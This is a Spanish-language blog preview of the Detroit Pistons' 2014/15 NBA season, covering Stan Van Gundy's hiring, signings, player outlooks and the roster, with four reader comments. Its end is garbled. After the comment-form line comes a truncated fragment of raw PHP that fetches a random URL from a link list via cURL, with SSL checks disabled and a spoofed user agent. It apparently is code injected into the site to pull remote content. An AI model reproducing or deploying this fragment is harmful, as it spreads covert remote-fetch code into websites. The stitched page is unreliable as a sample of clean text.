Detroit Pistons 2014/2015: SVG

11 de October de 2014 por Ruxixon

La importancia de unas siglas como imagen de marca, un mensaje corto pero que con sólo mirarlo lo identificas de manera clara y concisa con una idea, con un estilo. SVG, o lo que es lo mismo, Stan Van Gundy, llega a Detroit aglutinando los puestos de entrenador principal y presidente de operaciones para alegría de los aficionados de los Pistons. El ciclo de Dumars se extinguió tras la enésima prueba de fuego fallida: Mo Cheeks no funcionó como entrenador ni supo gestionar el disponer de Greg Monroe, Josh Smith y Andre Drummond en el mismo equipo. La fórmula de Van Gundy: aplicar los mismos esquemas de aquellos Orlando Magic cuyo cénit fueron las finales de la NBA en el 2009, en este caso con Drummond como el “nuevo Howard” y a su alrededor un conjunto de jugadores que deberá mover el balón con fluidez hasta encontrar la oportunidad de acribillar desde el triple a los equipos rivales. Mención especial para Brandon Jennings, Greg Monroe y Josh Smith que deberán ajustar sus roles por unos u otros motivos de los que hablaremos más adelante. Bienvenidos al “Hope for Detroit 2.0”, el primer paso para devolver al éxito a los Pistons.

Movimientos clave

El primero, los 35 millones y 5 años que se lleva Van Gundy para dar el banderazo de salida a lo que se espera que sea el renacer de la franquicia. En lo que respecta al draft, escogieron a Spencer Dinwiddie en el número 38 y ya ha firmado por 3 años, lo que demuestra una gran confianza por parte de la franquicia en este PG atípico desde sus casi 2 metros de altura. Se presentó al draft lesionado y seguramente empezará jugando en la D-League hasta que coja ritmo. Más activos estuvieron en una Free Agency que muchos han considerado cuanto menos controvertida pero que elimina sobre el papel el déficit tanto de tiro exterior como de anotación en la segunda unidad que tuvieron la temporada pasada. Por dos años han firmado Caron Butler (9 millones), DJ Augustine (6 millones) y Cartier Martin (2.5 millones) mientras que por 3 lo ha hecho el fichaje más polémico, Jodie Meeks, que cobrará 19 millones nada menos. Además han firmado fondo de armario para Drummond, contratando a Aaron Gray por 2 años, aunque sus problemas de corazón le ponen en jaque para esta temporada, y en última instancia al entrañable Hasheem Thabeet por el mínimo. Abrimos capítulo aparte para el “caso Monroe”. Rechazó una supuesta oferta de renovación por 44 millones en 4 años, firmando la oferta cualificada. Parece que el jugador quiere ser parte importante dentro de un proyecto ganador y eso Detroit no se lo da. En 1 año podrá elegir su destino libremente.

Qué esperamos de ellos

¿Es el año de Drummond? Si se cumple lo que SVG parece haber diseñado para el pívot de los Pistons, Drummond aparecerá en todas las quinielas como jugador más mejorado y jugador defensivo de la temporada. Quizás sea un proyecto más a medio plazo el llegar al nivel de aquel Howard pero este año tendremos que ver una evolución en su juego de espaldas y en la defensa individual. Por otra parte Josh Smith también ha sido elogiado por su nuevo entrenador y este año contará con una reválida importante para recuperar su status en la liga. Desde el PF tendrá que asumir la cuota justa de protagonismo (menos y mejores tiros) para ser diferencial desde el costado defensivo. Monroe parece partir como 6º hombre  hasta que se resuelva su situación. No será fácil para SVG lidiar con su situación, deberá mantenerlo en el proyecto mientras el jugador busca protagonismo para firmar un nuevo contrato. Un poco como Josh Smith, Jennings deberá sobar menos la bola. Por primera vez tiene un entrenador top y pondrá a prueba su madurez. No descartamos un posible traspaso si Jennings no se ajusta a las exigencias. Mucho tiro exterior, mejora en la faceta defensiva y protagonismo para Drummond y Josh Smith, si Van Gundy da con la tecla pueden ser la sorpresa del Este, hasta el punto de tener opciones de colarse en PO.

Pronóstico

No descartaría su entrada en la postemporada debido a la aparente flaqueza de equipos como Indiana o Brooklyn pero optando una vía más realista quedarán cerca de PO (es el Este) con 36 victorias.

Plantilla

PG: Brandon Jennings, DJ Augustine, Will Bynum, Spencer Dinwiddie (R).
SG: Kentavious Caldwell-Pope, Jodie Meeks.
SF: Caron Butler, Luigi Datome, Cartier Martin, Tony Mitchell, Kyle Singler.
PF: Josh Smith, Jonas Jerebko.
C: Andre Drummond, Greg Monroe, Aaron Gray, Hasheem Thabeet.

Bajas: Chauncey Billups (retirado), Rodney Stuckey (IND), Charlie Villanueva (DAL), Peyton Siva (ORL), Josh Harrellson (Chongqing Flying Dragons – China).

Comenta

4 comentarios a esta entrada

  1. Azabel dice:
    #1

    ultimo gran error de Dumars el fichaje de Smith; luego el año de Drummond todos (creo) esperabamos ver a la dupla Monroe de 4 y Drummond de 5, con suficientes minutos y tranquilidad para que se vayan haciendo

    la llegada de Smith genero presion por ser un mejor equipo, como asi tambien, recorto minutos a uno y otro sin darles el tiempo necesario para progresar, el colmo? el dinero que se lleva Smtih casi que impide la renovacion que merecia (segun el mercado, y varios se la van a ofrecer) Monroe, perdiendo la posibilidad cierta de ver a estos dos hombres grandes juntos, cosa que casi no se ve en la NBA en estos tiempos

    final definitivo de la ilusion de verlos juntos es la llegada de SVG, quien seguramente preferira un 4 abierto como Smtih, aunque tire triples horribles y dejar trabajar a Drummond o a Monroe de uno a la vez en la zona defensiva

    Dumars aposto en grande, habia cierto material y fichajes de buenos jugadores como Jennings y Smith los podrian haber colocado en PO, pero tal presion fue contraproducente, a tal punto que debieron echar entrenador, se hecho a perder el proyecto a largo plazo y hasta el propio Dumars deja la franquicia

    yo, por mi parte tengo ilusiones de ver un traspaso de Smith por algun expiring (los Rockets deberian ser interesados) que le permita el proximo año renovar a Monroe, al fin de cuentas los Pistons son el equipo que mas años y dinero le puede ofrecer, y apostar de una vez por todas a ver a Monroe y Drummond juntos como puntales toda una temporda

      Citar

  2. TheDeerHunter dice:
    #2

    La noticia más positiva es que se ha terminado la terrible era de Joe Dumars. Vaya dupla Isiah&Dumars, eran el terror de las canchas y también de los despachos pero en otro sentido.
    No confío demasiado en SVG. Siempre me pareció un entrenador para remar a favor de corriente, bastante plano en sus planteamientos y con cierta tendencia a complicarse la vida. Su éxito estuvo basado en el plantillón que le tocó en suerte en aquel momento en Orlando. Nada que ver con el engendro mal parido que le ha caído ahora.
    Como aficionado Laker, eso sí, le estaré siempre agradecido por cómo nos facilitó aquella final, forzando el regreso de un Nelson fuera de forma tras lesión y metiéndolo con calzador para mermarle la confianza a un jugador tan necesitado de ella como Rafer Alston. Para mí fue una de las claves de una final engañosamente cómoda a favor de los amarillos.
    En Detroit le deseo toda la suerte del mundo. Quizá no sea mala idea hacer un símil con aquellos Magic alrededor de Superman Howard, pero esta vez con Drummond. Desde luego será mucho mejor que lo que vimos el año pasado… lanzando Jennings contragolpes descabezados con Josh, Monroe y Drummond al galope. Estrambótico.
    Para exigirle en justicia la plantilla deberá cambiar bastante. No lo veo a corto plazo.
    De momento como se ha comentado hay una cosa en la que sí se están pareciendo en lo malo a Orlando. Sobrepagar contratos incomprensibles. Así no echarán demasiado de menos a Dumars.

      Citar

  3. Viva_Dirk dice:
    #3

    Han estado muy mal para mi en los despachos, el equipo pedía a gritos un exterior de calidad a cambio de Monroe, los Suns mejorarían bastante con Monroe…blanco y en botella. Sin embargo ahora tienen a un jugador sin sitio y que se marchará gratis el verano que viene y que es casi imposible de tradear ya que elige destino y eso frenará al cualquiera que se interese por el.

      Citar

  4. Ruxixon dice:
    #4

    Buen partido de debut de Dinwiddie.Se ha recuperado más rápido de lo que se pensaba y en su primer partido ha hecho 8 puntos y 6 asistencias,eso en 16 minutos.Viendo como está el backcourt de los Pistons,con Caldwell-Pope que igual llega muy justo para iniciar la temporada y Meeks fuera,igual tenemos a Spencer jugando algún minuto en contra de lo que servidor pensaba.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>